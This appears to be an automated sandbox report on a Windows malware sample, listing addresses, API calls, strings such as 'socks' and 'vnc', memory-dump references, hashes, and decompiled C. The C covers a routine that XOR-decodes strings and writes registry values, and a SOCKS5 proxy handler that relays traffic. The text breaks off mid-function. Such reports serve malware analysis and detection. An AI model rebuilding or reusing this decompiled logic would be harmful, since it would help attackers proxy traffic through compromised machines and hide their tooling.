0x0041ab5c
0x0041ab5c
0x00000000
0x0041ab50
0x0041a960
0x0041a960
0x0041a961
0x0041a96e
0x00000000
0x00000000
0x0041a986
0x0041a988
0x0041a98e
0x0041ab4a
0x0041ab4a
0x00000000
0x0041ab4a
0x0041a994
0x0041a996
0x0041a99c
0x0041a9a7
0x0041a9aa
0x0041a9ae
0x0041a9bf
0x0041a9ce
0x0041a9d5
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a9db
0x0041a9db
0x0041a9ea
0x0041a9f5
0x0041aa00
0x0041aa0a
0x0041aa12
0x00000000
0x00000000
0x0041aa1d
0x0041aa23
0x0041aa23
0x0041aa26
0x0041aa26
0x0041aa2c
0x00000000
0x0041aa4b
0x0041aa50
0x0041aa54
0x0041aab3
0x0041aab5
0x0041aac5
0x0041aac5
0x00000000
0x0041aa5e
0x0041aa6e
0x0041aa72
0x0041aaaa
0x0041aaae
0x00000000
0x0041aaae
0x0041aa7b
0x0041aa7d
0x0041aa82
0x0041aa8a
0x0041ab17
0x00000000
0x00000000
0x0041ab2a
0x0041ab32
0x0041aa9b
0x0041aaa4
0x00000000
0x0041aaa4
0x0041ab3d
0x0041ab41
0x00000000
0x0041ab41
0x0041aa95
0x00000000
0x0041aa95
0x0041aa54
0x0041aad0
0x0041aad3
0x00000000
0x00000000
0x0041aad9
0x0041aae0
0x0041aae2
0x0041aae2
0x0041aae6
0x00000000
0x00000000
0x0041aae8
0x0041aaf0
0x0041aaf9
0x0041aafc
0x00000000
0x00000000
0x00000000
0x0041aafc
0x0041ab09
0x00000000
0x0041aafe
0x0041aafe
0x0041aaff
0x00000000
0x0041ab04
0x0041a9db
0x0041a9a0
0x0041a9a0
0x0041a9a1
0x00000000
0x0041a9a0

APIs

lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 0041A881
lstrcmpiA.KERNEL32(?,vnc,?,socks,?,00000000,00000104), ref: 0041A899
setsockopt.WS2_32(00000000,00000006,00000001,?,00000004), ref: 0041A905
WSAIoctl.WS2_32(00000000), ref: 0041A939
HeapFree.KERNEL32(?,00000000,00000000,00000000,0000FDE9,00000001), ref: 0041A9BF
select.WS2_32(00000000,00000001,00000000,00000000,00000000), ref: 0041AA0A

Strings

p0u, xrefs: 0041AB5C
@, xrefs: 0041AA85
vnc, xrefs: 0041A893
socks, xrefs: 0041A87B

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcmpi$FreeHeapIoctlselectsetsockopt
String ID: @$p0u$socks$vnc
API String ID: 3618291485-2996672388
Opcode ID: 5d4c353fae503f136d458820d6e4c8b435546119a4ef7b72e71866523b14a9ce
Instruction ID: 9387f5adea85d91ff962fea4c793caee99434f17d95afe982a46bdf65d51d9c2
Opcode Fuzzy Hash: 5d4c353fae503f136d458820d6e4c8b435546119a4ef7b72e71866523b14a9ce
Instruction Fuzzy Hash: 9BA10670609340ABD320DF21DD84FAB77A9AF84750F50492EF685A72D0D774E881C79B

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC10, Relevance: 33.6, APIs: 16, Strings: 3, Instructions: 337
registryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E0040AC10(intOrPtr* __eax) {
				void* __esi;
				intOrPtr* _t87;
				signed short _t93;
				signed short _t94;
				signed int _t98;
				signed short _t99;
				signed short _t100;
				void* _t103;
				int _t111;
				long _t120;
				int _t126;
				signed int _t132;
				int _t136;
				short** _t145;
				signed char* _t152;
				signed char* _t153;
				signed char* _t156;
				signed char* _t157;
				signed char* _t159;
				signed short* _t173;
				signed short* _t175;
				signed int _t179;
				signed short* _t182;
				signed short* _t183;
				intOrPtr* _t195;
				short** _t196;
				short* _t198;
				intOrPtr _t202;
				short* _t203;
				void* _t212;
				int _t221;
				int _t227;
				void* _t229;

				_t87 = __eax;
				_t195 = __eax;
				 *0x42d404 = 0;
				 *0x42d408 = 0;
				InitializeCriticalSection(0x42d3ec);
				if( *0x42eb64 <= 1) {
					return _t87;
				}
				if(_t195 == 0 ||  *_t195 == 0) {
					L7:
					E00424100(0x19, _t229 + 0x64);
					E00424100(0x1a, _t229 + 0x2c);
					_t202 = _t229 + 0x50;
					E00424100(0x1b, _t202);
					 *(_t229 + 0x24) = _t229 + 0x2c;
					 *((intOrPtr*)(_t229 + 0x28)) = _t202;
					_t196 = _t229 + 0x24;
					_t136 = 2;
					goto L8;
					L11:
					_t196 =  &(_t196[1]);
					_t136 = _t136 - 1;
					if(_t136 != 0) {
						L8:
						_t203 =  *_t196;
						if(E00416580(0x80000001, _t229 + 0x68, _t203) != 0) {
							 *(_t229 + 0x38) = 0;
							 *(_t229 + 0x34) = 0x80000001;
							_t126 = RegCreateKeyExW(0x80000001, _t229 + 0x80, 0, 0, 0, 2, 0, _t229 + 0x14, 0);
							if(_t126 == 0) {
								RegSetValueExW( *(_t229 + 0x20), _t203, _t126, 4, _t229 + 0x18, 4);
								RegCloseKey( *(_t229 + 0x10));
							}
						}
						goto L11;
					} else {
						_t152 =  *0x401bfc; // 0x4047e0
						_t93 = 0;
						_t173 = _t229 + 0x64;
						do {
							 *_t173 = ( *_t152 ^ _t93 ^ 0x0000ff82) & 0x000000ff;
							_t93 = _t93 + 1;
							_t152 =  &(_t152[1]);
							_t173 =  &(_t173[1]);
						} while (_t93 < 0x2c);
						_t153 =  *0x401c04; // 0x4047d0
						 *((short*)(_t229 + 0xbc)) = 0;
						_t94 = 0;
						_t175 = _t229 + 0x2c;
						do {
							 *_t175 = ( *_t153 ^ _t94 ^ 0x0000fff1) & 0x000000ff;
							_t94 = _t94 + 1;
							_t153 =  &(_t153[1]);
							_t175 =  &(_t175[1]);
						} while (_t94 < 0xc);
						 *((short*)(_t229 + 0x58)) = 0;
						 *(_t229 + 0x24) = 0x80000001;
						if(RegOpenKeyExW(0x80000001, _t229 + 0x70, 0, 1, _t229 + 0x10) != 0) {
							L19:
							 *(_t229 + 0x38) = 0;
							 *(_t229 + 0x34) = 0x80000001;
							if(RegCreateKeyExW(0x80000001, _t229 + 0x80, 0, 0, 0, 2, 0, _t229 + 0x14, 0) == 0) {
								RegSetValueExW( *(_t229 + 0x10), _t229 + 0x3c, 0, 4, _t229 + 0x18, 4);
								RegCloseKey( *(_t229 + 0x10));
							}
							L21:
							_t156 =  *0x401c0c; // 0x404788
							_t98 = 0;
							_t212 = _t229 + 0x64;
							do {
								_t179 =  *_t156 & 0x000000ff ^ 0x00000003;
								_t156 =  &(_t156[1]);
								_t212 = _t212 + 2;
								 *((short*)(_t212 - 2)) = (_t179 ^ _t98) & 0x000000ff;
								_t98 = _t98 + 1;
							} while (_t98 < 0x44);
							_t157 =  *0x401c14; // 0x40477c
							_t99 = 0;
							 *((short*)(_t229 + 0xec)) = 0;
							_t182 = _t229 + 0x50;
							do {
								 *_t182 = ( *_t157 ^ _t99 ^ 0x0000ffab) & 0x000000ff;
								_t99 = _t99 + 1;
								_t157 =  &(_t157[1]);
								_t182 =  &(_t182[1]);
							} while (_t99 < 4);
							 *((short*)(_t229 + 0x58)) = 0;
							_t159 =  *0x401c1c; // 0x404774
							_t100 = 0;
							_t183 = _t229 + 0x2c;
							do {
								 *_t183 = ( *_t159 ^ _t100 ^ 0x0000ffb0) & 0x000000ff;
								_t100 = _t100 + 1;
								_t159 =  &(_t159[1]);
								_t183 =  &(_t183[1]);
							} while (_t100 < 4);
							 *(_t229 + 0x34) = 0;
							 *(_t229 + 0x48) = _t229 + 0x50;
							 *((intOrPtr*)(_t229 + 0x4c)) = _t229 + 0x2c;
							 *(_t229 + 0x1c) = 0;
							 *(_t229 + 0x14) = 5;
							do {
								_push( *(_t229 + 0x1c));
								_t221 = _t229 + 0xf8;
								_t103 = E00411D10(_t229 + 0x68, 0x4f, _t221, _t229 + 0x68);
								_t229 = _t229 + 8;
								if(_t103 <= 0) {
									goto L37;
								}
								_t145 = _t229 + 0x48;
								_t227 = 2;
								do {
									 *(_t229 + 0x2c) = 0;
									 *(_t229 + 0x34) = 4;
									 *(_t229 + 0x24) = 0x80000001;
									_t221 = _t221 | 0xffffffff;
									if(RegOpenKeyExW(0x80000001, _t229 + 0xfc, 0, 1, _t229 + 0x10) == 0) {
										_t198 =  *_t145;
										RegQueryValueExW( *(_t229 + 0x14), _t198, 0, _t229 + 0x2c, _t229 + 0x1c, _t229 + 0x20);
										_t221 =  ==  ?  *(_t229 + 0x20) : _t221;
										RegCloseKey( *(_t229 + 0x10));
										if(_t221 == 4 &&  *(_t229 + 0x24) == _t221 &&  *(_t229 + 0x18) != 0) {
											 *(_t229 + 0x3c) = 0;
											 *(_t229 + 0x34) = 0x80000001;
											_t111 = RegCreateKeyExW(0x80000001, _t229 + 0x10c, 0, 0, 0, 2, 0, _t229 + 0x14, 0);
											if(_t111 == 0) {
												RegSetValueExW( *(_t229 + 0x10), _t198, _t111, _t221, _t229 + 0x1c, _t221);
												RegCloseKey( *(_t229 + 0x10));
											}
										}
									}
									_t145 =  &(_t145[1]);
									_t227 = _t227 - 1;
								} while (_t227 != 0);
								L37:
								 *(_t229 + 0x1c) =  *(_t229 + 0x1c) + 1;
								_t85 = _t229 + 0x14;
								 *_t85 =  *(_t229 + 0x14) - 1;
							} while ( *_t85 != 0);
							return 1;
						}
						_t120 = RegQueryValueExW( *(_t229 + 0x10), _t229 + 0x3c, 0, 0, 0, 0);
						RegCloseKey( *(_t229 + 0x10));
						if((0 | _t120 == 0x00000000) == 0 || E00416580(0x80000001, _t229 + 0x68, _t229 + 0x2c) != 0) {
							goto L19;
						} else {
							goto L21;
						}
					}
				} else {
					E00424100(0x18, _t229 + 0x2c);
					E00424100(0x17, _t229 + 0x64);
					_t132 = 0;
					if( *_t195 == 0) {
						L6:
						E00416510(_t229 + 0x34, _t195, _t132);
						goto L7;
					} else {
						do {
							_t132 = _t132 + 1;
						} while ( *((intOrPtr*)(_t195 + _t132 * 2)) != 0);
						goto L6;
					}
				}
			}

0x0040ac10
0x0040ac1f
0x0040ac21
0x0040ac27
0x0040ac2d
0x0040ac3a
0x0040b050
0x0040b050
0x0040ac44
0x0040ac87
0x0040ac90
0x0040ac9e
0x0040aca3
0x0040acac
0x0040acb7
0x0040acbb
0x0040acbf
0x0040acc3
0x0040acc3
0x0040ad30
0x0040ad30
0x0040ad33
0x0040ad34
0x0040acc8
0x0040acc8
0x0040acdd
0x0040acf9
0x0040ad01
0x0040ad05
0x0040ad0d
0x0040ad1f
0x0040ad2a
0x0040ad2a
0x0040ad0d
0x00000000
0x0040ad36
0x0040ad36
0x0040ad3e
0x0040ad40
0x0040ad44
0x0040ad5b
0x0040ad5e
0x0040ad5f
0x0040ad60
0x0040ad63
0x0040ad69
0x0040ad71
0x0040ad79
0x0040ad7b
0x0040ad80
0x0040ad97
0x0040ad9a
0x0040ad9b
0x0040ad9c
0x0040ad9f
0x0040adb5
0x0040adba
0x0040adc6
0x0040ae04
0x0040ae19
0x0040ae1d
0x0040ae29
0x0040ae3f
0x0040ae4a
0x0040ae4a
0x0040ae50
0x0040ae50
0x0040ae56
0x0040ae58
0x0040ae60
0x0040ae63
0x0040ae66
0x0040ae67
0x0040ae72
0x0040ae76
0x0040ae77
0x0040ae7d
0x0040ae83
0x0040ae85
0x0040ae8d
0x0040ae91
0x0040aea8
0x0040aeab
0x0040aeac
0x0040aead
0x0040aeb0
0x0040aeb8
0x0040aebd
0x0040aec3
0x0040aec5
0x0040aed0
0x0040aee7
0x0040aeea
0x0040aeeb
0x0040aeec
0x0040aeef
0x0040aeff
0x0040af04
0x0040af08
0x0040af0c
0x0040af10
0x0040af20
0x0040af24
0x0040af2f
0x0040af36
0x0040af3b
0x0040af40
0x00000000
0x00000000
0x0040af46
0x0040af4a
0x0040af50
0x0040af66
0x0040af6e
0x0040af76
0x0040af7e
0x0040af89
0x0040af8f
0x0040afa8
0x0040afb4
0x0040afba
0x0040afc3
0x0040aff0
0x0040aff8
0x0040b000
0x0040b008
0x0040b018
0x0040b023
0x0040b023
0x0040b008
0x0040afc3
0x0040b029
0x0040b02c
0x0040b02c
0x0040b033
0x0040b038
0x0040b03c
0x0040b03c
0x0040b03c
0x00000000
0x0040b047
0x0040add6
0x0040ade6
0x0040adee
0x00000000
0x00000000
0x00000000
0x00000000
0x0040adee
0x0040ac4b
0x0040ac52
0x0040ac5e
0x0040ac63
0x0040ac68
0x0040ac77
0x0040ac82
0x00000000
0x0040ac70
0x0040ac70
0x0040ac70
0x0040ac71
0x00000000
0x0040ac70
0x0040ac68

APIs

InitializeCriticalSection.KERNEL32(0042D3EC,00000000,00000000), ref: 0040AC2D
RegCreateKeyExW.ADVAPI32(80000001), ref: 0040AD05
RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,00000000,00000004), ref: 0040AD1F
RegCloseKey.ADVAPI32(00000000), ref: 0040AD2A
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,00000000,77E49EB0), ref: 0040ADBE
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0040ADD6
RegCloseKey.ADVAPI32(?), ref: 0040ADE6
RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 0040AE21
RegSetValueExW.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 0040AE3F
RegCloseKey.ADVAPI32(?), ref: 0040AE4A
RegOpenKeyExW.ADVAPI32 ref: 0040AF81
RegQueryValueExW.ADVAPI32(80000001,00000000,00000000,00000000,?,?), ref: 0040AFA8
RegCloseKey.ADVAPI32(?), ref: 0040AFBA
RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000002,00000000,80000001,00000000), ref: 0040B000
RegSetValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 0040B018
RegCloseKey.ADVAPI32(?), ref: 0040B023

Strings

|G@, xrefs: 0040AE7D
tG@, xrefs: 0040AEBD
G@, xrefs: 0040AD36

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseValue$Create$OpenQuery$CriticalInitializeSection
String ID: tG@$|G@$G@
API String ID: 902824796-2805106197
Opcode ID: 6c7670adddaab5432f68c125d42383731a9b9679875cfa94f8bf0d122dcce640
Instruction ID: 125b504e0993ee8f908f150b8e35c93e263e575f4722233af7442101f02efb7a
Opcode Fuzzy Hash: 6c7670adddaab5432f68c125d42383731a9b9679875cfa94f8bf0d122dcce640
Instruction Fuzzy Hash: F2C1BE711543419FE720DF20D844BABB7E8EFC9704F40492DFA85A7290E778A949CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00408E30, Relevance: 30.8, APIs: 20, Instructions: 760
memorynetworkCOMMONCrypto

Download Yara Rule

C-Code - Quality: 56%

			E00408E30(intOrPtr _a4) {
				intOrPtr _v24;
				char _v28;
				intOrPtr _v72;
				intOrPtr _v92;
				char _v284;
				char _v424;
				intOrPtr _v480;
				intOrPtr _v484;
				intOrPtr _v588;
				intOrPtr _v608;
				char _v612;
				short _v624;
				char _v636;
				char _v768;
				signed short _v780;
				char _v868;
				signed short _v880;
				signed int _v1076;
				intOrPtr _v1080;
				intOrPtr _v1084;
				void* _v1088;
				intOrPtr _v1096;
				signed int _v1100;
				intOrPtr _v1104;
				char _v1108;
				signed int _v1204;
				char _v1208;
				signed int _v1212;
				signed int _v1220;
				signed int _v1224;
				short _v1226;
				char _v1228;
				signed char _v1229;
				signed char _v1231;
				char _v1232;
				void* _v1236;
				signed int _v1244;
				signed int _v1248;
				signed int _v1252;
				signed int _v1260;
				signed int _v1264;
				signed char _v1265;
				char _v1268;
				signed char _v1269;
				signed int _v1272;
				short _v1274;
				signed int _v1276;
				signed int _v1280;
				char _v1281;
				char _v1284;
				char _v1285;
				char _v1286;
				signed int _v1288;
				signed int _v1292;
				char _v1296;
				signed int _v1304;
				signed int _v1308;
				char _v1309;
				intOrPtr _v1312;
				signed int _v1316;
				intOrPtr _v1320;
				char _v1324;
				signed int _v1328;
				signed int _v1332;
				intOrPtr _v1336;
				signed int _v1340;
				signed int _v1348;
				intOrPtr _v1352;
				intOrPtr _v1356;
				intOrPtr _v1372;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t250;
				signed int _t259;
				signed int _t260;
				signed int* _t264;
				signed int _t266;
				signed int _t268;
				signed int _t271;
				signed int* _t273;
				signed int _t276;
				intOrPtr _t279;
				signed int _t282;
				signed int _t286;
				signed int _t292;
				signed int _t308;
				signed int _t312;
				signed int _t315;
				signed int _t318;
				signed int _t319;
				void* _t323;
				signed int _t324;
				signed short _t326;
				void* _t327;
				signed int _t330;
				signed short _t337;
				signed int _t338;
				signed char _t339;
				signed int _t340;
				void* _t341;
				signed int _t342;
				signed int _t343;
				signed char _t350;
				signed int _t356;
				signed int _t358;
				signed char _t359;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t368;
				intOrPtr _t371;
				signed int _t377;
				signed int _t382;
				void* _t386;
				char* _t402;
				intOrPtr _t412;
				signed char _t418;
				intOrPtr _t423;
				signed int _t428;
				signed int _t440;
				signed char _t456;
				signed char _t463;
				signed int _t466;
				short* _t467;
				void* _t468;
				signed int _t470;
				signed int _t480;
				signed int _t481;
				intOrPtr _t483;
				intOrPtr _t486;
				long _t487;
				void* _t488;
				void* _t489;
				signed int _t491;
				signed int _t497;
				void* _t498;
				intOrPtr _t500;
				signed int _t501;
				signed int _t502;
				signed int _t503;
				void* _t504;

				_t371 = _a4;
				_t250 =  &_v1248;
				_v1248 = 0x80;
				__imp__#6(_t371,  &_v768, _t250);
				if(_t250 != 0) {
					_t382 = 0;
					__eflags = 0;
				} else {
					_t382 = _v780 & 0x0000ffff;
				}
				_v1244 = 0 | _t382 == 0x00000017;
				if(E00414B90(1, _t371, 0,  &_v1265) == 0) {
					L50:
					__eflags = 0;
					return 0;
				}
				_t256 = _v1265;
				if(_v1265 == 0 || E00414B90(_t256 & 0x000000ff, _t371, 0,  &_v780) == 0) {
					goto L50;
				}
				_t259 = _v1265 & 0x000000ff;
				if(_t259 == 0) {
					L9:
					_t260 = 0;
				} else {
					while(1) {
						_t259 = _t259 - 1;
						if( *(_t504 + _t259 + 0x1f8) == 0) {
							_t260 = _t504 + _t259 + 0x1f8;
							goto L10;
						}
						if(_t259 != 0) {
							continue;
						} else {
							goto L9;
						}
						goto L10;
					}
				}
				L10:
				asm("sbb eax, eax");
				_t264 =  &_v1260;
				_v1260 = ( ~_t260 & 0xffff0100) + 0x0000ff05 & 0x0000ffff;
				__imp__#19(_t371, _t264, 2, 0);
				if(_t264 != 2) {
					goto L50;
				}
				if(_v1276 != 0xff05) {
					_v1280 = 0;
					_t266 = E00414B90(4, _t371, 0,  &_v1232);
					__eflags = _t266;
					if(_t266 == 0) {
						goto L50;
					}
					__eflags = _v1232 - 5;
					if(_v1232 != 5) {
						goto L50;
					} else {
						__eflags = _v1260 & 0x00000001;
						if((_v1260 & 0x00000001) == 0) {
							_v1228 = 2;
							_v1224 = 0x17;
						} else {
							_v1228 = 0x17;
							_v1224 = 2;
						}
					}
					_t466 = 0;
					_t268 = (_v1229 & 0x000000ff) - 1;
					__eflags = _t268;
					_v1252 = 0;
					if(_t268 == 0) {
						_t271 = E00414B90(4, _v24, 0,  &_v1208);
						__eflags = _t271;
						if(_t271 == 0) {
							goto L50;
						}
						_t466 = HeapAlloc( *0x42e6d4, 8, 0x14);
						_v1252 = _t466;
						__eflags = _t466;
						if(_t466 != 0) {
							_t428 = 2;
							_push(4);
							_t273 =  &_v1208;
							_t74 = _t466 + 4; // 0x4
							_t386 = _t74;
							goto L47;
						} else {
							_v1280 = 1;
						}
					} else {
						_t356 = _t268 - 2;
						__eflags = _t356;
						if(_t356 == 0) {
							_t378 = _v24;
							_t358 = E00414B90(1, _v24, 0,  &_v1269);
							__eflags = _t358;
							if(_t358 == 0) {
								goto L50;
							}
							_t359 = _v1269;
							__eflags = _t359;
							if(_t359 == 0) {
								goto L50;
							}
							_t361 = E00414B90(_t359 & 0x000000ff, _t378, 0,  &_v284);
							__eflags = _t361;
							if(_t361 == 0) {
								goto L50;
							}
							_t362 =  &_v1244;
							 *((char*)(_t504 + (_v1269 & 0x000000ff) + 0x408)) = 0;
							_v1244 = 0;
							__imp__getaddrinfo( &_v284, 0, 0, _t362);
							__eflags = _t362;
							if(_t362 == 0) {
								_t491 = _v1260;
								_t463 = 0;
								__eflags = 0;
								do {
									_t363 = _t491;
									__eflags = _t491;
									if(_t491 == 0) {
										goto L36;
									} else {
										_t423 =  *((intOrPtr*)(_t504 + 0x48 + (_t463 & 0x000000ff) * 4));
										while(1) {
											__eflags =  *((intOrPtr*)(_t363 + 4)) - _t423;
											if( *((intOrPtr*)(_t363 + 4)) == _t423) {
												break;
											}
											_t363 =  *(_t363 + 0x1c);
											__eflags = _t363;
											if(_t363 != 0) {
												continue;
											} else {
												goto L36;
											}
											goto L48;
										}
										_t466 = E00410840( *((intOrPtr*)(_t363 + 0x10)),  *((intOrPtr*)(_t363 + 0x18)));
										_v1272 = _t466;
										__eflags = _t466;
										if(_t466 != 0) {
											__eflags =  *_t466 - 0x17;
											if( *_t466 != 0x17) {
												goto L40;
											} else {
												 *((intOrPtr*)(_t466 + 0x18)) = 0;
												 *((intOrPtr*)(_t466 + 4)) = 0;
												__imp__freeaddrinfo(_v1260);
											}
										} else {
											_v1296 = 1;
											L40:
											__imp__freeaddrinfo(_v1260);
										}
									}
									goto L48;
									L36:
									_t463 = _t463 + 1;
									__eflags = _t463 - 2;
								} while (_t463 < 2);
								_v1296 = 4;
								__imp__freeaddrinfo(_t491);
							} else {
								_v1296 = 4;
							}
						} else {
							__eflags = _t356 != 1;
							if(_t356 != 1) {
								goto L50;
							}
							_t36 = _t466 + 0x10; // 0x10
							_t368 = E00414B90(_t36, _v24, 0,  &_v1076);
							__eflags = _t368;
							if(_t368 == 0) {
								goto L50;
							}
							_t466 = HeapAlloc( *0x42e6d4, 8, 0x20);
							_v1252 = _t466;
							__eflags = _t466;
							if(_t466 != 0) {
								_t428 = 0x17;
								_push(0x10);
								_t273 =  &_v1076;
								_t40 = _t466 + 8; // 0x8
								_t386 = _t40;
								L47:
								_push(_t273);
								_push(_t386);
								 *_t466 = _t428;
								E00410820();
							} else {
								_v1280 = 1;
							}
						}
					}
					L48:
					_t276 = E00414B90(2, _v24, 0,  &_v1236);
					__eflags = _t276;
					if(_t276 == 0) {
						E004107C0(_t466);
						goto L50;
					}
					__eflags = _v1280;
					_v1281 = 1;
					if(_v1280 == 0) {
						_t467 = _v1252;
						 *((short*)(_t467 + 2)) = _v1236;
						_t286 = (_v1231 & 0x000000ff) - 1;
						__eflags = _t286;
						if(_t286 == 0) {
							_t480 = E00414D20(_t467);
							__eflags = _t480 - 0xffffffff;
							if(_t480 != 0xffffffff) {
								E004152F0();
								_t374 = _v24;
								_push(_v1260);
								_t290 = E00408CE0(_t480, _v24, 0);
								__eflags = _t290 - 1;
								if(_t290 != 1) {
									__eflags = _t290 - 0xffffffff;
									if(_t290 != 0xffffffff) {
										_v1285 = 0;
									} else {
										_v1284 = 1;
									}
								} else {
									_push(_t480);
									_t290 = E004150D0(_t374);
								}
								goto L152;
							} else {
								_v1280 = 5;
							}
						} else {
							_t292 = _t286 - 1;
							__eflags = _t292;
							if(_t292 == 0) {
								__eflags =  *_t467 - 0x17;
								 *((short*)(_t467 + 2)) = 0;
								if( *_t467 != 0x17) {
									 *((intOrPtr*)(_t467 + 4)) = 0;
								} else {
									E00410870(_t467 + 8, _t467 + 8, 0, 0x10);
								}
								_t481 = E00414EE0(_t467, 1);
								_v1280 = _t481;
								__eflags = _t481 - 0xffffffff;
								if(_t481 != 0xffffffff) {
									_push(_v1260);
									_t468 = E00408CE0(_t481, _v24, 0);
									__eflags = _t468 - 1;
									if(_t468 != 1) {
										L141:
										E004152D0(_t295, _t481);
										__eflags = _t468 - 0xffffffff;
										if(_t468 != 0xffffffff) {
											__eflags = _t468 - 1;
											if(_t468 != 1) {
												_v1285 = 0;
											}
										} else {
											_v1284 = 1;
										}
									} else {
										_t497 = E004152A0( &_v28);
										E004152D0(_t298, _v1280);
										__eflags = _t497 - 0xffffffff;
										if(_t497 != 0xffffffff) {
											E004152F0();
											_t376 = _v28;
											_push(_v1264 | 0x00000002);
											_t468 = E00408CE0(_t497, _v28, 0);
											__eflags = _t468 - 1;
											if(_t468 == 1) {
												_push(_t497);
												_t295 = E004150D0(_t376);
											}
											_t481 = _t497;
											goto L141;
										} else {
											_v1284 = 1;
										}
									}
								} else {
									_v1280 = 5;
								}
							} else {
								__eflags = _t292 == 1;
								if(_t292 == 1) {
									_t483 = _v24;
									_v1212 = 0x80;
									_v1220 = 0x80;
									__imp__#6(_t483,  &_v1204,  &_v1212);
									__eflags = 0x80;
									if(0x80 != 0) {
										L62:
										_v1292 = 1;
									} else {
										_t308 =  &_v1232;
										__imp__#5(_t483,  &_v424, _t308);
										__eflags = _t308;
										if(_t308 != 0) {
											goto L62;
										} else {
											__eflags = _v1228 - 0x17;
											_v1226 = 0;
											if(_v1228 == 0x17) {
												_v1204 = _t308;
												_v1224 = _t308;
											}
											_t498 = E00415320( &_v1228);
											_v1280 = _t498;
											__eflags = _t498 - 0xffffffff;
											if(_t498 != 0xffffffff) {
												_t377 = HeapAlloc( *0x42e6d4, 8, 0x10003);
												__eflags = _t377;
												if(_t377 != 0) {
													_push(_v1284);
													_t312 = E00408CE0(_t498, _t483, 0);
													__eflags = _t312 - 1;
													if(_t312 != 1) {
														__eflags = _t312 - 0xffffffff;
														if(_t312 != 0xffffffff) {
															_v1309 = 0;
															_t290 = E004107C0(_t377);
															_t480 = _t498;
														} else {
															_v1308 = 1;
															_t290 = E004107C0(_t377);
															_t480 = _t498;
														}
													} else {
														_t470 = 0;
														_t315 = _t312 | 0xffffffff;
														_v1292 = _t315;
														_v1276 = 0;
														_v1304 = 0;
														_v1088 = 2;
														_v1084 = _t483;
														_v1080 = _t498;
														_v1076 = _t315;
														__imp__#18(0,  &_v1088, 0, 0, 0);
														__eflags = _t315;
														if(_t315 > 0) {
															while(1) {
																_t315 = E00414B60( &_v1108, _t483);
																__eflags = _t315;
																if(_t315 == 0) {
																	goto L71;
																}
																__imp__#16(_t483, _t377, 0xffff, 0);
																__eflags = _t315;
																if(_t315 > 0) {
																	goto L71;
																}
																goto L126;
																L71:
																_v1316 = 0x80;
																_t318 = E00414B60( &_v1108, _t498);
																__eflags = _t318;
																if(_t318 == 0) {
																	L116:
																	_t486 = _v1312;
																	__eflags = _t486 - 0xffffffff;
																	if(_t486 != 0xffffffff) {
																		_t319 = E00414B60( &_v1108, _t486);
																		__eflags = _t319;
																		if(_t319 != 0) {
																			_t440 =  &_v1252;
																			__imp__#17(_t486, _t377 + _t470, 0xffff, 0, _t440,  &_v1316);
																			_t500 = _v1320;
																			__eflags = 0xffff - _t470;
																			if(0xffff - _t470 > 0) {
																				L120:
																				 *_t377 = 0;
																				 *((char*)(_t377 + 2)) = 0;
																				__eflags = _v1276 - 0x17;
																				 *(_t377 + 3) = ((_t440 & 0xffffff00 | _v1276 != 0x00000017) - 0x00000001 & 0x00000003) + 1;
																				__eflags = _t500 - 0x17;
																				if(_t500 != 0x17) {
																					__eflags = _t500 - 2;
																					if(_t500 == 2) {
																						_push(4);
																						_t402 =  &_v1272;
																						goto L124;
																					}
																				} else {
																					_push(0x10);
																					_t402 =  &_v1268;
																					L124:
																					_t202 = _t377 + 4; // 0x4
																					E00410820();
																					_t205 = _t470 - 2; // -2
																					_t323 = E00410820(_t377 + _t205,  &_v1286, 2);
																					_t324 = _t323 + _t470;
																					__eflags = _t324;
																					__imp__#20(_v1352, _t377, _t324, 0,  &_v636, _v1372, _t202, _t402);
																				}
																			} else {
																				_t440 = _v1276 & 0x0000ffff;
																				__eflags = _t500 - _t440;
																				if(_t500 == _t440) {
																					goto L120;
																				}
																			}
																		}
																	}
																	_t315 = _v1304;
																	__eflags = _t486 - 0xffffffff;
																	_v1104 = _v72;
																	_v1100 = _t315;
																	_v1096 = _t486;
																	_v1108 = (0 | _t486 != 0xffffffff) + 2;
																	__imp__#18(0,  &_v1108, 0, 0, 0);
																	__eflags = _t315;
																	if(_t315 > 0) {
																		_t498 = _v1324;
																		_t483 = _v92;
																		continue;
																	}
																} else {
																	_t315 =  &_v1316;
																	__imp__#17(_v1304, _t377, 0xffff, 0,  &_v1252, _t315);
																	_t501 = _t315;
																	_v1288 = _t501;
																	__eflags = _t501;
																	if(_t501 > 0) {
																		__eflags = _t501 - 6;
																		if(_t501 < 6) {
																			goto L116;
																		} else {
																			_t326 = _v1276;
																			__eflags = _v484 - _t326;
																			if(_v484 != _t326) {
																				goto L116;
																			} else {
																				__eflags = _t326 - 2;
																				if(_t326 != 2) {
																					__eflags = _t326 - 0x17;
																					if(_t326 != 0x17) {
																						goto L84;
																					} else {
																						_t489 = 0;
																						while(1) {
																							_t350 =  *((intOrPtr*)(_t504 + _t489 + 0x380));
																							_t418 =  *((intOrPtr*)(_t504 + _t489 + 0x68));
																							__eflags = _t350 - _t418;
																							if(_t350 != _t418) {
																								break;
																							}
																							_t489 = _t489 + 1;
